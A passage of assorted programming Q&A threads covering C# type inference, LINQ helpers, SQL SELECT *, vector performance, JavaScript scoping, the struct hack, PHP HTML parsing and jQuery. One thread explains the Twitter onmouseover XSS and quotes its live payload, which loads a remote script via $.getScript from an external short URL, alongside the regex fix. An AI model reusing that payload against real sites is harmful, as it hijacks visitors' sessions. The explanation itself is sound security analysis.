§7.5.2.11 Fixing

• The set of candidate types Uj starts out as the set of all types in the set of bounds for Xi.

⇒ { `string` (lower bound) }

• We then examine each bound for Xi in turn: [...] For each lower bound U of Xi all types Uj to which there is not an implicit conversion from U are removed from the candidate set. [...]

⇒ doesn’t remove anything from the candidate set, right?

• If among the remaining candidate types Uj there is a unique type V from which there is an implicit conversion to all the other candidate types, then Xi is fixed to V.

⇒ Since there is only one candidate type, this is vacuously true, so Xi is fixed to `string`. Right?

So where am I going wrong?

UPDATE: My initial investigation on the bus this morning was incomplete and wrong. The text of the first phase specification is correct. The implementation is correct.

The spec is wrong in that it gets the order of events wrong in the second phase. We should be specifying that we make output type inferences before we fix the non-dependent parameters.

Man, this stuff is complicated. I have rewritten this section of the spec more times than I can remember.

I have seen this problem before, and I distinctly recall making revisions such that the incorrect term "type variable" was replaced everywhere with "type parameter". (Type parameters are not storage locations whose contents can vary, so it makes no sense to call them variables.) I think at the same time I noted that the ordering was wrong. Probably what happened was we accidentally shipped an older version of the spec on the web. Many apologies.

I will work with Mads to get the spec updated to match the implementation. I think the correct wording of the second phase should go something like this:

• If no unfixed type parameters exist then type inference succeeds.
• Otherwise, if there exists one or more arguments Ei with corresponding parameter type Ti such that the output type of Ei with type Ti contains at least one unfixed type parameter Xj, and none of the input types of Ei with type Ti contains any unfixed type parameter Xj, then an output type inference is made from all such Ei to Ti.

Whether or not the previous step actually made an inference, we must now fix at least one type parameter, as follows:

• If there exists one or more type parameters Xi such that Xi is unfixed, and Xi has a non-empty set of bounds, and Xi does not depend on any Xj then each such Xi is fixed. If any fixing operation fails then type inference fails.
• Otherwise, if there exists one or more type parameters Xi such that Xi is unfixed, and Xi has a non-empty set of bounds, and there is at least one type parameter Xj that depends on Xi then each such Xi is fixed. If any fixing operation fails then type inference fails.
• Otherwise, we are unable to make progress and there are unfixed parameters. Type inference fails.

If type inference neither fails nor succeeds then the second phase is repeated.

The idea here is that we want to ensure that the algorithm never goes into an infinite loop. At every repetition of the second phase it either succeeds, fails, or makes progress. It cannot possibly loop more times than there are type parameters to fix to types.

Thanks for bringing this to my attention.
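To see why the corrected ordering matters, here is a toy simulation of the fixing step (§7.5.2.11) in Python. The convertibility table is hand-written for just these two types; it illustrates the algorithm, not the real C# conversion rules:

``````python
# Toy model of fixing (7.5.2.11): hand-written implicit-conversion table.
IMPLICIT = {("string", "object")}  # string -> object (reference conversion)

def convertible(u, v):
    return u == v or (u, v) in IMPLICIT

def fix(lower_bounds):
    candidates = set(lower_bounds)
    for u in lower_bounds:
        # drop candidates to which there is no implicit conversion from u
        candidates = {c for c in candidates if convertible(u, c)}
    # the unique candidate convertible to all the others wins
    unique = [v for v in candidates
              if all(convertible(v, c) for c in candidates)]
    return unique[0] if len(unique) == 1 else None

fix({"string"})            # the trace in the question: yields "string"
fix({"string", "object"})  # after output type inference: yields "object"
``````

With only the lower bound from the first argument, fixing yields `string`; once the lambda's output type inference has added `object` as a lower bound, fixing yields `object`, matching what the compilers do.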

## What's your favorite LINQ to Objects operator which is not built-in?

With extension methods, we can write handy LINQ operators which solve generic problems.

I want to hear which methods or overloads you are missing in the `System.Linq` namespace and how you implemented them.

Clean and elegant implementations, maybe using existing methods, are preferred.

## Append & Prepend

``````/// <summary>Adds a single element to the end of an IEnumerable.</summary>
/// <typeparam name="T">Type of enumerable to return.</typeparam>
/// <returns>IEnumerable containing all the input elements, followed by the
/// specified additional element.</returns>
public static IEnumerable<T> Append<T>(this IEnumerable<T> source, T element)
{
if (source == null)
throw new ArgumentNullException("source");
return concatIterator(element, source, false);
}

/// <summary>Adds a single element to the start of an IEnumerable.</summary>
/// <typeparam name="T">Type of enumerable to return.</typeparam>
/// <returns>IEnumerable containing the specified additional element, followed by
/// all the input elements.</returns>
public static IEnumerable<T> Prepend<T>(this IEnumerable<T> tail, T head)
{
if (tail == null)
throw new ArgumentNullException("tail");
return concatIterator(head, tail, true);
}

private static IEnumerable<T> concatIterator<T>(T extraElement,
IEnumerable<T> source, bool insertAtStart)
{
if (insertAtStart)
yield return extraElement;
foreach (var e in source)
yield return e;
if (!insertAtStart)
yield return extraElement;
}
``````

## Can select * usage ever be justified?

I've always preached to my developers that `SELECT *` is evil and should be avoided like the plague.

Are there any cases where it can be justified?

I'm not talking about `COUNT(*)` - which most optimizers can figure out.

Edit

And one great example I saw of this bad practice was a legacy asp application that used `select *` in a stored procedure, and used `ADO` to loop through the returned records, but got the columns by index. You can imagine what happened when a new field was added somewhere other than the end of the field list.

I'm quite happy using `*` in audit triggers.

In that case it can actually be a benefit: if additional columns are added to the base table, the trigger will raise an error, so the change cannot be forgotten in the audit trigger and/or audit table structure.

## Is it OK to try/catch something just to check if an exception was thrown or not?

Is it good practice to run some otherwise useless code just to see whether it throws a particular exception?
I want to do something when the exception is thrown, and nothing otherwise.

``````try {
new BigDecimal("some string"); // This do nothing because the instance is ignored
} catch (NumberFormatException e) {
return false; // OK, the string wasn't a well-formed decimal
}
return true;
``````

There are too many preconditions to test, and the `BigDecimal` constructor already checks them all, so this seems the simplest approach.

Generally, this practice should be avoided. But since there is no utility method `isValidBigDecimal(..)`, this is the way to go.

As Peter Tillemans noted in the comments, place this code in a utility method called `isValidBigDecimal(..)`. That way your code stays agnostic of how validity is determined, and you can even switch to another method later.
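A sketch of that utility method, wrapping the try/catch as suggested (the class and method names are our own choice, not a standard API):

``````java
import java.math.BigDecimal;

public class BigDecimalUtil {
    /** Returns true if the string is a well-formed decimal. */
    public static boolean isValidBigDecimal(String s) {
        try {
            new BigDecimal(s); // result discarded; only validity matters
            return true;
        } catch (NumberFormatException e) {
            return false;
        }
    }
}
``````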

## std::vector is so much slower than plain arrays?

I've always thought it's the general wisdom that `std::vector` is "implemented as an array," blah blah blah. Today I went and tested it, and it seems that's not so.

Here are some test results:

``````UseArray completed in 2.619 seconds
UseVector completed in 9.284 seconds
UseVectorPushBack completed in 14.669 seconds
The whole thing completed in 26.591 seconds
``````

That's about 3 to 4 times slower! That hardly justifies the "`vector` may be slower for a few nanosecs" comments.

And the code I used:

``````#include <cstdlib>
#include <vector>

#include <iostream>
#include <string>

#include <boost/date_time/posix_time/ptime.hpp>
#include <boost/date_time/microsec_time_clock.hpp>

class TestTimer
{
public:
TestTimer(const std::string & name) : name(name),
start(boost::date_time::microsec_clock<boost::posix_time::ptime>::local_time())
{
}

~TestTimer()
{
using namespace std;
using namespace boost;

posix_time::ptime now(date_time::microsec_clock<posix_time::ptime>::local_time());
posix_time::time_duration d = now - start;

cout << name << " completed in " << d.total_milliseconds() / 1000.0 <<
" seconds" << endl;
}

private:
std::string name;
boost::posix_time::ptime start;
};

struct Pixel
{
Pixel()
{
}

Pixel(unsigned char r, unsigned char g, unsigned char b) : r(r), g(g), b(b)
{
}

unsigned char r, g, b;
};

void UseVector()
{
TestTimer t("UseVector");

for(int i = 0; i < 1000; ++i)
{
int dimension = 999;

std::vector<Pixel> pixels;
pixels.resize(dimension * dimension);

for(int i = 0; i < dimension * dimension; ++i)
{
pixels[i].r = 255;
pixels[i].g = 0;
pixels[i].b = 0;
}
}
}

void UseVectorPushBack()
{
TestTimer t("UseVectorPushBack");

for(int i = 0; i < 1000; ++i)
{
int dimension = 999;

std::vector<Pixel> pixels;
pixels.reserve(dimension * dimension);

for(int i = 0; i < dimension * dimension; ++i)
pixels.push_back(Pixel(255, 0, 0));
}
}

void UseArray()
{
TestTimer t("UseArray");

for(int i = 0; i < 1000; ++i)
{
int dimension = 999;

Pixel * pixels = (Pixel *)malloc(sizeof(Pixel) * dimension * dimension);

for(int i = 0 ; i < dimension * dimension; ++i)
{
pixels[i].r = 255;
pixels[i].g = 0;
pixels[i].b = 0;
}

free(pixels);
}
}

int main()
{
TestTimer t1("The whole thing");

UseArray();
UseVector();
UseVectorPushBack();

return 0;
}
``````

Am I doing it wrong or something? Or have I just busted this performance myth?

Edit: I'm using Release mode in MSVS2005.

In MSVC, `#define _SECURE_SCL 0` reduces `UseVector` by half (bringing it down to 4 seconds). This is really huge IMO. Someone please upvote me a couple more times so this gets known by more folks :p

Using the following:

g++ -O3 Time.cpp -I <MyBoost>
./a.out
UseArray completed in 2.196 seconds
UseVector completed in 4.412 seconds
UseVectorPushBack completed in 8.017 seconds
The whole thing completed in 14.626 seconds

So array is twice as quick as vector.

But after looking at the code in more detail, this is expected: you run across the vector twice and the array only once. Note: when you resize() the vector you are not only allocating the memory but also running through the vector and calling the constructor on each member.

Rearranging the code slightly so that the vector only initializes each object once:

`````` std::vector<Pixel>  pixels(dimension * dimension, Pixel(255,0,0));
``````

Now doing the same timing again:

g++ -O3 Time.cpp -I <MyBoost>
./a.out
UseVector completed in 2.216 seconds

The vector now performs only slightly worse than the array. IMO this difference is insignificant and could be caused by a whole bunch of things not associated with the test.

I would also take into account that you are not correctly initializing/destroying the Pixel objects in the UseArray() method, since neither constructor nor destructor is called (this may not be an issue for this simple class, but anything slightly more complex, i.e. with pointers or members with pointers, will cause problems).
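For completeness, a sketch of an array version that does construct its elements, using new[]/delete[] (the function name is ours, and a smaller dimension keeps it quick; this mirrors what resize() does for the vector):

``````cpp
#include <cassert>

struct Pixel {
    Pixel() {}
    Pixel(unsigned char r, unsigned char g, unsigned char b) : r(r), g(g), b(b) {}
    unsigned char r, g, b;
};

unsigned char FillAndReadFirst()
{
    const int dimension = 99;                          // smaller than the benchmark
    Pixel * pixels = new Pixel[dimension * dimension]; // default-constructs every element
    for (int i = 0; i < dimension * dimension; ++i)
        pixels[i] = Pixel(255, 0, 0);
    unsigned char r = pixels[0].r;
    delete[] pixels;                                   // runs destructors, unlike free()
    return r;
}
``````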

## What is this practice called in JavaScript?

When you wrap your JavaScript code in a function like this:

``````(function(){

var field = ...;
function doSomething(){...
...

})();
``````

I noticed that this fixes scoping problems for me on a lot of web pages. What is this practice called?

The pattern is called self-invocation, a self-invoking function. It can create a closure, but that is an effect of the pattern (perhaps the intended effect), not the pattern itself.
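A minimal sketch of the scoping effect: var declarations inside the wrapper shadow, but do not overwrite, variables in the enclosing (global) scope. The variable names here are made up:

``````javascript
var mode = "global"; // a page-level variable some other script relies on

(function () {
    var mode = "local";                    // shadows the outer variable
    function update() { mode = mode + "!"; }
    update();                              // only touches the wrapper's own variable
})();

// out here, mode is still "global"
``````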

## Today's XSS onmouseover exploit on twitter.com

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:

`http://t.co/@"style="font-size:999999999999px;"onmouseover="\$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/`

Is this technically an XSS attack or something else?

The vulnerability is because URLs were not being parsed properly. For example, the following URL is posted to Twitter:

``````http://thisisatest.com/@"onmouseover="alert('test xss')"/
``````

Twitter treats this as the URL. When it is parsed Twitter wraps a link around that code, so the HTML now looks like:

``````<a href="http://thisisatest.com/@"onmouseover="alert('test xss')"rel/" target="_blank" ="">http://thisisatest.com/@"onmouseover="alert('test xss')"/</a></span>
``````

You can see that by putting in the URL and the trailing slash, Twitter thinks it has a valid URL even though it contains a quote mark in it which allows it to escape (ie. terminate the `href` attribute, for the pedants out there) the URL attribute and include a mouse over. You can write anything to the page, including closing the link and including a script element. Also, you are not limited by the 140 character limit because you can use `\$.getScript()`.

This commit, if it were pulled, would have prevented this XSS vulnerability.

In detail, the offending regex was:

``````REGEXEN[:valid_url_path_chars] = /(?:
#{REGEXEN[:wikipedia_disambiguation]}|
@[^\/]+\/|
[\.\,]?#{REGEXEN[:valid_general_url_path_chars]}
)/ix
``````

The `@[^\/]+\/` part allowed any character (except a forward slash) when it was prefixed by an @ sign and suffixed by a forward slash.

By changing to `@#{REGEXEN[:valid_general_url_path_chars]}+\/` it now only allows valid URL characters.
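The difference can be seen with simplified stand-ins for the two regex fragments (hedged: the real `REGEXEN[:valid_general_url_path_chars]` class is larger than the one sketched here):

``````ruby
PERMISSIVE  = /@[^\/]+\//             # anything but "/" after "@", then "/"
VALID_CHARS = /@[A-Za-z0-9_\-.~]+\//  # simplified "valid URL chars" class

path = %q{@"onmouseover="alert('xss')"/}

PERMISSIVE.match(path)    # matches: the quote characters slip through
VALID_CHARS.match(path)   # nil: the quote is rejected
``````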

## Get rid of ugly if statements

I have this ugly code:

``````if ( v > 10 ) size = 6;
if ( v > 22 ) size = 5;
if ( v > 51 ) size = 4;
if ( v > 68 ) size = 3;
if ( v > 117 ) size = 2;
if ( v > 145 ) size = 1;
return size;
``````

How can I get rid of the multiple if statements?

``````if ( v > 145 ) size = 1;
else if ( v > 117 ) size = 2;
else if ( v > 68 ) size = 3;
else if ( v > 51 ) size = 4;
else if ( v > 22 ) size = 5;
else if ( v > 10 ) size = 6;

return size;
``````

This is better for your case.

Optionally you should choose Switch Case where ever possible

`Update:` If your analysis shows that the value of 'v' generally resides in the lower range (< 10) in most cases, then you can add this:

``````if(v < 10)           size = SOME_DEFAULT_VALUE;
else if ( v > 145 )  size = 1;
else if ( v > 117 )  size = 2;
else if ( v > 68 )   size = 3;
else if ( v > 51 )   size = 4;
else if ( v > 22 )   size = 5;
else if ( v > 10 )   size = 6;
``````

`Further:` You can also reorder the conditions according to your analysis. If you know that most values are less than 10, and that the next most common group lies between 68 and 117, you can alter the condition sequence accordingly.
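If the chain grows longer, a table-driven version keeps the thresholds and results together. A sketch in C, with 0 as an assumed default for v <= 10 (the original code left `size` unset in that case):

``````c
#include <assert.h>

/* Thresholds in descending order, paired with the size for each band. */
static const int THRESHOLDS[] = {145, 117, 68, 51, 22, 10};
static const int SIZES[]      = {  1,   2,  3,  4,  5,  6};

int size_for(int v)
{
    for (int i = 0; i < 6; ++i)
        if (v > THRESHOLDS[i])
            return SIZES[i];
    return 0; /* assumed default for v <= 10 */
}
``````

Adding a band then means adding one row to the tables rather than another branch.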

## -1 * int.MinValue == int.MinValue?? Is this a bug?

In C# I see that

``````-1 * int.MinValue == int.MinValue
``````

Is this a bug? It really screwed me up when I was trying to implement a search tree. I ended up using `(int.MinValue + 1)` so that I could properly negate it.

This is not a bug.

`int.MinValue * -1` is `1` greater than what `int.MaxValue` can hold. Thus, the number wraps around back to `int.MinValue`.

This is basically caused by an integer overflow.

`Int32.MinValue`:

The value of this constant is `-2,147,483,648`

`Int32.MaxValue`:

The value of this constant is `2,147,483,647`

So, `-2,147,483,648 * -1 = 2,147,483,648` which is `1` greater than `Int32.MaxValue`.
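The same two's-complement wraparound can be reproduced in Java, whose int is also 32-bit (a sketch for illustration; C# behaves this way in an unchecked context, while `checked` arithmetic would throw OverflowException instead):

``````java
public class WrapDemo {
    public static void main(String[] args) {
        int min = Integer.MIN_VALUE;        // -2,147,483,648
        int negated = -1 * min;             // overflows 32 bits, wraps around
        System.out.println(negated == min); // prints true
    }
}
``````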

## Is the "struct hack" technically undefined behavior?

What I am asking about is the well known "last member of a struct has variable length" trick. It goes something like this:

``````struct T {
int len;
char s[1];
};

struct T *p = malloc(sizeof(struct T) + 100);
p->len = 100;
strcpy(p->s, "hello world");
``````

Because of the way that the struct is laid out in memory, we are able to overlay the struct over a larger than necessary block and treat the last member as if it were larger than the `1 char` specified.

So the question is: Is this technique technically undefined behavior?. I would expect that it is, but was curious what the standard says about this.

PS: I am aware of the C99 approach to this, I would like the answers to stick specifically to the version of the trick as listed above.

As the C FAQ says:

It's not clear if it's legal or portable, but it is rather popular.

and:

... an official interpretation has deemed that it is not strictly conforming with the C Standard, although it does seem to work under all known implementations. (Compilers which check array bounds carefully might issue warnings.)

The rationale behind the 'strictly conforming' bit is in the spec, section J.2 Undefined behavior, which includes in the list of undefined behavior:

• An array subscript is out of range, even if an object is apparently accessible with the given subscript (as in the lvalue expression `a[1][7]` given the declaration `int a[4][5]`) (6.5.6).

Paragraph 8 of Section 6.5.6 Additive operators has another mention that access beyond defined array bounds is undefined:

If both the pointer operand and the result point to elements of the same array object, or one past the last element of the array object, the evaluation shall not produce an overflow; otherwise, the behavior is undefined.
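As an aside, a common variant of the same trick sizes the allocation with offsetof so any padding before `s` is not counted twice. This does not change the conformance question; `make_T` is our own helper name, not part of the original:

``````c
#include <assert.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>

struct T {
    int len;
    char s[1];
};

/* Allocate a struct T with room for `len` characters plus a NUL. */
struct T *make_T(int len, const char *text) {
    struct T *p = malloc(offsetof(struct T, s) + (size_t)len + 1);
    if (!p) return NULL;
    p->len = len;
    strcpy(p->s, text); /* caller guarantees strlen(text) <= len */
    return p;
}
``````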

## How to parse HTML with PHP?

Suggestion for a reference question. Stack Overflow has dozens of "How to parse HTML" questions coming in every day. However, it is very difficult to close as a duplicate because most questions deal with the specific scenario presented by the asker. This question is an attempt to build a generic "reference question" that covers all aspects of the issue.

This is an experiment. If such a reference question already exists, let me know and I'll happily remove this one.

My ideal vision is that each of the three questions gets answered separately, and the best answers to each bubble up to the top.

I will be awarding a 200 bounty to the best answer in each of the three categories two weeks from now, pending discussion of this question on Meta.

Each of these questions has already been answered brilliantly elsewhere, so copy+pasting your own answer to a different question is fine with me.

How do I parse HTML with PHP?

1. What libraries are there? Which ones use PHP's native DOM, which ones come with their own parsing engine? (Hint: SimpleHTMLDOM)

1a. I need to find a specific element, but I find it hard to get used to the XPath syntax. Are there any DOM-based libraries that make parsing HTML easier? Please give generic real-world examples.

2. Is there a PHP library that enables me to query the DOM using CSS[2/3] selectors, like jQuery does? (Hint: phpQuery) Please give generic real-world examples.

3. Bonus question: Why shouldn't I use regular expressions? Please provide a very short answer in layman's terms.

phpQuery and QueryPath are extremely similar in replicating the fluent jQuery API. That's also why they are among the easiest approaches to properly parsing HTML in PHP.

Examples for QueryPath

Basically, you first create a queryable DOM tree from an HTML string:

`````` \$qp = qp("<html><body><h1>title</h1>..."); // or give filename or URL
``````

The resulting object contains a complete tree representation of the HTML document. It can be traversed using DOM methods. But the common approach is to use CSS selectors like in jQuery:

`````` \$qp->find("div.classname")->children()->...;

foreach (\$qp->find("p img") as \$img) {
print qp(\$img)->attr("src");
}
``````

Mostly you want to use simple #id and .class or DIV tag selectors for ->find(). But you can also use XPath statements, which are sometimes faster. Typical jQuery methods like ->children(), ->text(), and particularly ->attr() simplify extracting the right HTML snippets. (And they already have their SGML entities decoded.)

`````` \$qp->xpath("//div/p[1]");  // get first paragraph in a div
``````

QueryPath also allows injecting new tags into the stream (->append), and later output and prettify an updated document (->writeHTML). It can not only parse malformed HTML, but also various XML dialects (with namespaces), and even extract data from HTML microformats (XFN, vCard).

`````` \$qp->find("a[target=_blank]")->toggleClass("usability-blunder");
``````


phpQuery or QueryPath?

Generally, QueryPath is better suited for manipulating documents, while phpQuery also implements some pseudo-AJAX methods (just HTTP requests) to more closely resemble jQuery. It is said that phpQuery is often faster than QueryPath (because it has fewer features overall).
For further information on the differences, see this comparison: http://www.tagbytag.org/articles/phpquery-vs-querypath

And here's a comprehensive QueryPath introduction: http://www.ibm.com/developerworks/opensource/library/os-php-querypath/index.html?S_TACT=105AGX01&S_CMP=HP

• Simplicity and reliability
• Simple-to-use alternatives like ->find("a img, a object, div a")
• Proper data unescaping (in comparison to regular-expression grepping)

## Why doesn't jQuery bomb if your selector object is invalid?

Was recently using some code along the lines of

``````\$("#divMenuContainer:visible").hide("explode");
``````

However, after some time spent trying to get it to work, I realized my selector was referencing a div that didn't exist.

The result of the query was simply that it didn’t execute.

Obviously this is by design; could anyone explain the logic of why this design choice was made rather than raising some sort of exception?

Not trying to criticise just trying to understand.

There are a few good reasons here; "chainability" is the main driver. The ability to write very terse code by chaining requires that no errors be thrown, so the chain works seamlessly. For example:

``````\$("#divMenuContainer:visible").hide("explode").add("#another").fadeIn();
``````

Each object in the chain, even if it references no DOM elements, may have more added later. Or let's take another example:

``````\$("#divMenuContainer:visible").live("click", function() { ... });
``````

In this case we don't care about any of the elements the selector found, we care about the selector itself. Here's another:

``````\$("#divMenuContainer:visible").find(".child").hide("explode").end().fadeOut();
``````

Even if there are no children, we may want to hop back in the chain afterwards, continuing to use the `.prevObject` reference to go back up the chain.

There are dozens of distinct cases like this that show the benefits of the library being the way it is. As for the why: in interviews, John Resig, the creator of jQuery, states that's just how it worked out. He was after code as terse as he could get it, and the chaining model is what came out of that; it just happens to have a lot of benefits as well. The examples above are just a few of those.

To be clear, I'm not saying every attribute of chaining is a good one, there are just many upsides to it.

``````\$(".comment").click(replyToFunction);
``````

Should that fail because there aren't any comments yet? No, not really; that's expected, and I wouldn't want an error here: if the element exists, do it; if not, don't. My point is, at least in my experience, not throwing an error because of a missing element is tremendously more useful than throwing one.

The selector in your question, the `#ID` selector, is a very special case where you expect only a single element, so maybe you could argue it should fail there... but then that wouldn't be consistent with other selectors, and you want a library to be consistent.

With pretty much any other selector you expect 0-many elements, so failing when you don't find any elements would be significantly less desirable in most situations, even more so in the cases like `.live()` above.
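Under the hood, the pattern is easy to mimic: every method loops over the matched set and returns the wrapper, so an empty set is a harmless no-op. A toy sketch, not jQuery's actual implementation:

``````javascript
// Toy chainable wrapper over an array of element-like objects.
function wrap(elements) {
    return {
        elements: elements,
        hide()   { this.elements.forEach(e => { e.hidden = true;  }); return this; },
        fadeIn() { this.elements.forEach(e => { e.hidden = false; }); return this; },
    };
}

// Zero matched elements: every method body loops zero times, no errors.
const empty = wrap([]).hide().fadeIn();

// One matched element: the same chain does the work.
const one = wrap([{ hidden: false }]).hide();
``````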

## How many JavaScript programs are executed for a single web-page in the browser?

JavaScript programs consist of statements and function declarations. When a JavaScript program is executed, these two steps occur:

1. the code is scanned for function declarations; every function declaration is "executed" (by creating a function object) and a named reference to that function is created (so that the function can be called from within a statement)

2. the statements are executed (evaluated) sequentially (as they appear in the code)

Because of that, this works just fine:

``````<script>
foo();
function foo() {
return;
}
</script>
``````

Although the "foo" function is called before it is declared, it works because the function declaration is evaluated before the statement.

However, this does not work:

``````<script>
foo();
</script>
<script>
function foo() {
return;
}
</script>
``````

A ReferenceError will be thrown ("foo is not defined"). This leads to the conclusion that every SCRIPT element inside the HTML code of the web-page represents a separate JavaScript program and every time the HTML parser encounters a SCRIPT element, it executes the program inside that element (and then once the program is executed, the parser moves on to the HTML code that follows the SCRIPT element).

Then again, this does work:

``````<script>
function foo() {
return;
}
</script>
<script>
foo();
</script>
``````

My understanding here is that the Global object (which serves as the Variable object in the global execution context) exists (and remains) at all times, so the first JavaScript program will create the function object and make a reference for it, and then the second JavaScript program will use that reference to call the function. Therefore, all JavaScript programs (within a single web-page) "use" the same Global object, and all changes done to the Global object by one JavaScript program can be observed by all JavaScript programs that run subsequently.

Now, note this...

``````<script>
// assuming that foo is not defined
foo(); // throws ReferenceError
alert("Hi!"); // never executed
</script>
``````

In the above case, the alert call will not execute, because the "foo()" statement throws a ReferenceError (which breaks the whole JavaScript program) and therefore, all subsequent statements do not execute.

However, in this case...

``````<script>
// assuming that foo is not defined
foo(); // throws ReferenceError
</script>
<script>
alert("Hi!"); // executes normally
</script>
``````

Now, the alert call does get executed. The first JavaScript program throws a ReferenceError (and as a consequence breaks), but the second JavaScript program runs normally. Of course, the browser will report the error (although it did execute subsequent JavaScript programs, after the error occurred).

Now, my conclusions are:

• every SCRIPT element within the HTML code of the web-page represents a separate JavaScript program. These programs execute immediately as the HTML parser encounters them.
• all JavaScript programs within the same web-page "use" the same Global object. That Global object exists at all times (from the moment the web-page is fetched up until the web-page is destroyed). JavaScript programs may manipulate the Global object, and all changes done to the Global object by one JavaScript program can be observed in all subsequent JavaScript programs.
• if one JavaScript program breaks (by having an error thrown), that does not prevent subsequent JavaScript programs from executing.

Please fact-check this post and tell me if I got something wrong.

Also, I have not found resources that explain the behaviors mentioned in this post, and I assume that the browser makers must have published such resources somewhere, so if you know about them, please provide the links to them.

UPDATE!

OK, I am going to (try to) answer my own question here :) I got a response (via e-mail) from Dmitry A. Soshnikov (he runs a blog about JavaScript at http://www.dmitrysoshnikov.com/ ).

His take on this issue is this: Each SCRIPT block contains global code. Executing each SCRIPT block creates a new execution context. Therefore, each SCRIPT block has its own execution context, but all those execution contexts share the same Global object.

SCRIPT blocks could be viewed as different "sub-programs" with the same shared state.

Furthermore, the ECMAScript spec (3rd edition) states (chapter 10): "Global code is source text that is treated as an ECMAScript Program."

Dmitry Soshnikov has answered your question. Every `<script>` element is executed as a Program, as defined by the ECMAScript specification. There is one global object that each Program within a single page uses. And that's really it.

## Why is SELECT * considered harmful?

Why is `SELECT *` bad practice? Wouldn't it mean less code to change if you added a new column you wanted?

I understand that `SELECT COUNT(*)` is a performance problem on some DBs, but what if you really wanted every column?

The asterisk character, "*", in the SELECT statement is shorthand for all the columns in the table(s) involved in the query.

## Performance

The `*` shorthand can be slower because:

• Not all the fields are indexed, possibly forcing a full table scan, which is less efficient
• The few keystrokes saved by writing `SELECT *` risk the cost of a full table scan
• It returns more data than is needed
• Returning trailing columns that use variable-length data types can result in search overhead

## Maintenance

When using `SELECT *`:

• Someone unfamiliar with the codebase would be forced to consult documentation to know which columns are returned before being able to make competent changes. Making code more readable and minimizing ambiguity for people unfamiliar with the code saves time and effort in the long run.
• If code depends on column order, `SELECT *` hides an error waiting to happen should the table's column order change.
• Even if you need every column at the time the query is written, that might not be the case in the future
• It complicates profiling
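The column-order hazard is easy to demonstrate with Python's sqlite3 module (a sketch; the table and column names are made up):

``````python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE users (id INTEGER, name TEXT)")
con.execute("INSERT INTO users VALUES (1, 'alice')")

def name_by_index(con):
    # fragile: trusts that `name` is the second column of SELECT *
    return con.execute("SELECT * FROM users").fetchone()[1]

def name_by_name(con):
    # robust: names the column explicitly
    return con.execute("SELECT name FROM users").fetchone()[0]

name_by_index(con)   # 'alice' -- works today

# A later migration inserts a column before `name`:
con.executescript("""
    ALTER TABLE users RENAME TO old_users;
    CREATE TABLE users (id INTEGER, email TEXT, name TEXT);
    INSERT INTO users SELECT id, NULL, name FROM old_users;
""")

name_by_index(con)   # now returns None (the email column) -- a silent bug
name_by_name(con)    # still 'alice'
``````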

## Design

`SELECT *` is an anti-pattern:

• The purpose of the query is less obvious; which columns the application actually uses is opaque
• It breaks the modularity rule about using strict typing whenever possible. Explicit is almost universally better.

## When Should "SELECT *" Be Used?

It's acceptable to use `SELECT *` when there's the explicit need for every column in the table(s) involved, as opposed to every column that existed when the query was written. The database will internally expand the * into the complete list of columns - there's no performance difference.

Otherwise, explicitly list every column that is to be used in the query - preferably while using a table alias.